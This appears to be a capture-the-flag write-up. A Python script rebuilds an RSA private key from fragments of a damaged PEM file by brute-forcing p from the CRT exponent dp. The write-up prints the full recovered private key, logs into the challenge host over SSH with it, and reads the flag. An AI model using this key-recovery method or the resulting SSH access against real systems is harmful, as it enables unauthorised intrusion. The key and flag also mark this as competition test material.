#!/usr/bin/env python3 from Crypto.Util.number import * from Crypto.PublicKey import RSA from base64 import * with open('singularity', 'r') as f: pem = f.read() key1 = b64decode(''.join(pem.split('\n')[1:7])) key2 = b64decode(''.join(pem.split('\n')[28:40])) q = bytes_to_long(key2[0x000f:0x000f+0x0101]) dp = bytes_to_long(key2[0x0114:0x0114+0x0100]) e = 65537 for kp in range(3, e): p_mul = dp * e - 1 if p_mul % kp == 0: p = (p_mul // kp) + 1 if isPrime(p): break n = p * q hex_n_head = key1[12:].hex() assert hex(n)[2:].startswith(hex_n_head) phi = (p - 1) * (q - 1) d = inverse(e, phi) key = RSA.construct((n, e, d)) priv_pem = key.exportKey().decode() with open('privkey.pem', 'w') as f: f.write(priv_pem)
$ cat privkey.pem -----BEGIN RSA PRIVATE KEY----- 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 -----END RSA PRIVATE KEY----- $ ssh -i privkey.pem hawking@0.cloud.chals.io -p 19149 The authenticity of host '[0.cloud.chals.io]:19149 ([165.227.210.30]:19149)' can't be established. ECDSA key fingerprint is SHA256:kjxofmaMDhHwdqjuqDAsAIOfGkJGfO6SaDgvVNrIfXY. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '[0.cloud.chals.io]:19149,[165.227.210.30]:19149' (ECDSA) to the list of known hosts. Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-88-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage This system has been minimized by removing packages and content that are not required on a system that users do not log into. To restore this content, you can run the 'unminimize' command. The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sat Apr 2 07:13:28 2022 from 10.1.126.129 hawking@441e90207a19:~$ ls flag.txt hawking@441e90207a19:~$ cat flag.txt shctf{1nf0rm4ti0n_c4nn0t_b3_d3str0y3d}
shctf{1nf0rm4ti0n_c4nn0t_b3_d3str0y3d}